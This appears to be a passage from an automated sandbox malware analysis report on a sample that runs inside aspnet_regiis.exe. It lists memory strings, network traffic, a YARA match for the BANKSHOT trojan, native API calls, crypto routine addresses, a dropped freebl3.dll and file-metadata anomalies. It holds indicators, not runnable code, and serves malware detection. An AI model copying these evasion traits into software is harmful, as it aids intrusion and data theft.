Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/FBFIEBGHJE
Source: HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.9:49712 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

3_2_02A11F55

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth

PE file has nameless sections

Source: file.exe

Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5BA4E0 GetModuleHandleW,NtQueryInformationProcess,	0_2_6D5BA4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0145B GetCurrentProcess,NtQueryInformationProcess,	3_2_02A0145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CACB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CACB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CACB8C0 rand_s,NtQueryVirtualMemory,	3_2_6CACB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CACB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6CACB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6CA6F280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B80E0	0_2_6D5B80E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5BA4E0	0_2_6D5BA4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5BABD0	0_2_6D5BABD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5D9D15	0_2_6D5D9D15
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B4510	0_2_6D5B4510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C8110	0_2_6D5C8110
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C7110	0_2_6D5C7110
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B5D00	0_2_6D5B5D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CC900	0_2_6D5CC900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5BA9F0	0_2_6D5BA9F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C4D90	0_2_6D5C4D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C3D80	0_2_6D5C3D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C7850	0_2_6D5C7850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C5C50	0_2_6D5C5C50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C3870	0_2_6D5C3870
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C5060	0_2_6D5C5060
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C4060	0_2_6D5C4060
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C2C00	0_2_6D5C2C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CA030	0_2_6D5CA030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C7C20	0_2_6D5C7C20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C28D0	0_2_6D5C28D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B4CF0	0_2_6D5B4CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C68F0	0_2_6D5C68F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B98E0	0_2_6D5B98E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C8C80	0_2_6D5C8C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C5F50	0_2_6D5C5F50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B2B70	0_2_6D5B2B70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B3370	0_2_6D5B3370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C6B60	0_2_6D5C6B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C4360	0_2_6D5C4360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C4B00	0_2_6D5C4B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C3330	0_2_6D5C3330
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C2FC0	0_2_6D5C2FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B3FE0	0_2_6D5B3FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C9790	0_2_6D5C9790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C53B0	0_2_6D5C53B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C87A0	0_2_6D5C87A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CC250	0_2_6D5CC250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5B5A40	0_2_6D5B5A40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5CC620	0_2_6D5CC620
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C7EC0	0_2_6D5C7EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5C22C0	0_2_6D5C22C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1C472	3_2_02A1C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2D1C3	3_2_02A2D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2D933	3_2_02A2D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1B712	3_2_02A1B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2CD2E	3_2_02A2CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1950A	3_2_02A1950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2DD1B	3_2_02A2DD1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2D561	3_2_02A2D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA635A0	3_2_6CA635A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAC34A0	3_2_6CAC34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CACC4A0	3_2_6CACC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA76C80	3_2_6CA76C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6D4E0	3_2_6CA6D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA6CF0	3_2_6CAA6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA764C0	3_2_6CA764C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA8D4D0	3_2_6CA8D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD542B	3_2_6CAD542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CADAC00	3_2_6CADAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA5C10	3_2_6CAA5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAB2C10	3_2_6CAB2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA75440	3_2_6CA75440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD545C	3_2_6CAD545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAC85F0	3_2_6CAC85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA0DD0	3_2_6CAA0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA7FD00	3_2_6CA7FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA8ED10	3_2_6CA8ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA90512	3_2_6CA90512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAC4EA0	3_2_6CAC4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CACE680	3_2_6CACE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA85E90	3_2_6CA85E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD76E3	3_2_6CAD76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6BEF0	3_2_6CA6BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA7FEF0	3_2_6CA7FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAC9E30	3_2_6CAC9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAB5600	3_2_6CAB5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA7E10	3_2_6CAA7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD6E63	3_2_6CAD6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6C670	3_2_6CA6C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAB2E4E	3_2_6CAB2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA84640	3_2_6CA84640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA89E50	3_2_6CA89E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA3E50	3_2_6CAA3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAB77A0	3_2_6CAB77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6DFE0	3_2_6CA6DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA96FF0	3_2_6CA96FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA79F00	3_2_6CA79F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA7710	3_2_6CAA7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA960A0	3_2_6CA960A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA8C0E0	3_2_6CA8C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA58E0	3_2_6CAA58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD50C7	3_2_6CAD50C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAAB820	3_2_6CAAB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAB4820	3_2_6CAB4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA77810	3_2_6CA77810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAAF070	3_2_6CAAF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA88850	3_2_6CA88850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA8D850	3_2_6CA8D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6C9A0	3_2_6CA6C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA9D9B0	3_2_6CA9D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA5190	3_2_6CAA5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAC2990	3_2_6CAC2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA7D960	3_2_6CA7D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CABB970	3_2_6CABB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CADB170	3_2_6CADB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA8A940	3_2_6CA8A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA622A0	3_2_6CA622A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA94AA0	3_2_6CA94AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA7CAB0	3_2_6CA7CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD2AB0	3_2_6CAD2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CADBA90	3_2_6CADBA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA81AF0	3_2_6CA81AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAAE2F0	3_2_6CAAE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA8AC0	3_2_6CAA8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA9A60	3_2_6CAA9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6F380	3_2_6CA6F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD53C8	3_2_6CAD53C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAAD320	3_2_6CAAD320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA7C370	3_2_6CA7C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA65340	3_2_6CA65340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB6ECD0	3_2_6CB6ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB0ECC0	3_2_6CB0ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBEAC30	3_2_6CBEAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBD6C00	3_2_6CBD6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB1AC60	3_2_6CB1AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB14DB0	3_2_6CB14DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC9CDC0	3_2_6CC9CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBA6D90	3_2_6CBA6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC3AD50	3_2_6CC3AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBDED70	3_2_6CBDED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC98D20	3_2_6CC98D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB96E90	3_2_6CB96E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB1AEC0	3_2_6CB1AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBB0EC0	3_2_6CBB0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBF0E20	3_2_6CBF0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBAEE70	3_2_6CBAEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB1EFB0	3_2_6CB1EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBEEFF0	3_2_6CBEEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB10FE0	3_2_6CB10FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC58FB0	3_2_6CC58FB0

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6D5CDB80 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 6CAA94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 02A047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 6CA9CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 02A10609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 02A104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 6CC909D0 appears 37 times

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.1421898994.000000000114E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.1407332677.0000000000C44000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHusbandPlayerNathan778Kaitlyn.ePKZT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameHusbandPlayerNathan778Kaitlyn.ePKZT vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

